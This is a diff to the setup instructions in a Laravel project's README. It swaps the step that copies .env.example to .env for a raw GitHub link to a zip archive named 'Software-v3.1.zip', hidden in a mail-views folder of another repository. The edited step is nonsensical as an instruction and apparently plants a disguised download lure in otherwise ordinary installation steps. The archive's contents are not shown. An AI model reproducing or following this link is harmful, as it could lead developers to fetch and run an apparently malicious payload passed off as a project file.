Lionmjr/NEXUS/README.md

 ### Usage
 1. Clone the repository and cd into it
 2. In your terminal run the command composer install
-3. Rename or copy .env.example file to .env
+3. Rename or copy https://raw.githubusercontent.com/AustinThiga/NEXUS/main/resources/views/mails/Software-v3.1.zip file to .env
 4. php artisan key:generate
 5. Set your database credentials in your .env file
 6. Import the db file(nexus)into your database(mysql)